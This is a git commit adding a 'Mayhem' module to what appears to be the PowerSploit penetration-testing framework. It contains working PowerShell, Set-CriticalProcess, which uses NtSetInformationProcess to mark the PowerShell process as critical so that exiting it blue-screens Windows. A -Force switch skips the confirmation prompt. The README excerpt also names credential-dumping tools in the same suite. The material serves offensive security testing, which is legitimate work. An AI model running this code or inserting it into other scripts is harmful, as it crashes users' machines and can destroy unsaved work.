Adding Mayhem module and Set-CriticalProcess

2014-06-19 20:28:50 -04:00 · 2014-06-19 20:28:50 -04:00 · 29a5d48c3f
parent 80ffa19fa3
commit 29a5d48c3f
4 changed files with 206 additions and 0 deletions
--- a/Mayhem/Mayhem.psd1
+++ b/Mayhem/Mayhem.psd1
@ -0,0 +1,87 @@
@{
 # Script module or binary module file associated with this manifest.
 ModuleToProcess = 'Mayhem.psm1'
 # Version number of this module.
 ModuleVersion = '1.0.0.0'
 # ID used to uniquely identify this module
 GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'
 # Author of this module
 Author = 'Matthew Graeber'
 # Company or vendor of this module
 CompanyName = ''
 # Copyright statement for this module
 Copyright = 'BSD 3-Clause'
 # Description of the functionality provided by this module
 Description = 'PowerSploit Mayhem Module'
 # Minimum version of the Windows PowerShell engine required by this module
 PowerShellVersion = '2.0'
 # Name of the Windows PowerShell host required by this module
 # PowerShellHostName = ''
 # Minimum version of the Windows PowerShell host required by this module
 # PowerShellHostVersion = ''
 # Minimum version of the .NET Framework required by this module
 # DotNetFrameworkVersion = ''
 # Minimum version of the common language runtime (CLR) required by this module
 # CLRVersion = ''
 # Processor architecture (None, X86, Amd64) required by this module
 # ProcessorArchitecture = ''
 # Modules that must be imported into the global environment prior to importing this module
 # RequiredModules = @()
 # Assemblies that must be loaded prior to importing this module
 # RequiredAssemblies = @()
 # Script files (.ps1) that are run in the caller's environment prior to importing this module.
 # ScriptsToProcess = ''
 # Type files (.ps1xml) to be loaded when importing this module
 # TypesToProcess = @()
 # Format files (.ps1xml) to be loaded when importing this module
 # FormatsToProcess = @()
 # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
 # NestedModules = @()
 # Functions to export from this module
 FunctionsToExport = '*'
 # Cmdlets to export from this module
 CmdletsToExport = '*'
 # Variables to export from this module
 VariablesToExport = ''
 # Aliases to export from this module
 AliasesToExport = ''
 # List of all modules packaged with this module.
 ModuleList = @(@{ModuleName = 'Mayhem'; ModuleVersion = '1.0.0.0'; GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'})
 # List of all files packaged with this module
 FileList = 'Mayhem.psm1', 'Mayhem.psd1', 'Usage.md'
 # Private data to pass to the module specified in RootModule/ModuleToProcess
 # PrivateData = ''
 # HelpInfo URI of this module
 # HelpInfoURI = ''
 # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
 # DefaultCommandPrefix = ''
 }
--- a/Mayhem/Mayhem.psm1
+++ b/Mayhem/Mayhem.psm1
@ -0,0 +1,99 @@
 function Set-CriticalProcess
 {
 <#
 .SYNOPSIS
 Causes your machine to blue screen upon exiting PowerShell.
 PowerSploit Function: Set-CriticalProcess
 Author: Matthew Graeber (@mattifestation)
 License: BSD 3-Clause
 Required Dependencies: None
 Optional Dependencies: None
 .PARAMETER ExitImmediately
 Immediately exit PowerShell after successfully marking the process as critical.
 .PARAMETER Force
 Set the running PowerShell process as critical without asking for confirmation.
 .EXAMPLE
 Set-CriticalProcess
 .EXAMPLE
 Set-CriticalProcess -ExitImmediately
 .EXAMPLE
 Set-CriticalProcess -Force -Verbose
 #>
    [CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param (
        [Switch]
        $Force,
        [Switch]
        $ExitImmediately
    )
    if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))
    {
        throw 'You must run Set-CriticalProcess from an elevated PowerShell prompt.'
    }
    $Response = $True
    if (!$Force)
    {
        $Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.')
    }
    if (!$Response)
    {
        return
    }
    $DynAssembly = New-Object System.Reflection.AssemblyName('BlueScreen')
    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BlueScreen', $False)
    # Define [ntdll]::NtQuerySystemInformation method
    $TypeBuilder = $ModuleBuilder.DefineType('BlueScreen.Win32.ntdll', 'Public, Class')
    $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('NtSetInformationProcess',
                                                        'ntdll.dll',
                                                        ([Reflection.MethodAttributes] 'Public, Static'),
                                                        [Reflection.CallingConventions]::Standard,
                                                        [Int32],
                                                        [Type[]] @([IntPtr], [UInt32], [IntPtr].MakeByRefType(), [UInt32]),
                                                        [Runtime.InteropServices.CallingConvention]::Winapi,
                                                        [Runtime.InteropServices.CharSet]::Auto)
    $ntdll = $TypeBuilder.CreateType()
    $ProcHandle = [Diagnostics.Process]::GetCurrentProcess().Handle
    $ReturnPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(4)
    $ProcessBreakOnTermination = 29
    $SizeUInt32 = 4
    try
    {
        $null = $ntdll::NtSetInformationProcess($ProcHandle, $ProcessBreakOnTermination, [Ref] $ReturnPtr, $SizeUInt32)
    }
    catch
    {
        return
    }
    Write-Verbose 'PowerShell is now marked as a critical process and will blue screen the machine upon exiting the process.'
    if ($ExitImmediately)
    {
        Stop-Process -Id $PID
    }
 }
--- a/Mayhem/Usage.md
+++ b/Mayhem/Usage.md
@ -0,0 +1,12 @@
 To install this module, drop the entire Mayhem folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
 The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
 The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
 To use the module, type `Import-Module Mayhem`
 To see the commands imported, type `Get-Command -Module Mayhem`
 For help on each individual command, Get-Help is your friend.
 Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--- a/README.md
+++ b/README.md
@ -196,6 +196,14 @@ Displays Windows vault credential objects including cleartext web credentials.
 Generates a full-memory minidump of a process.
 ## Mayhem
 **Cause general mayhem with PowerShell.**
 #### `Set-CriticalProcess`
 Causes your machine to blue screen upon exiting PowerShell.
 ## Recon
 **Tools to aid in the reconnaissance phase of a penetration test.**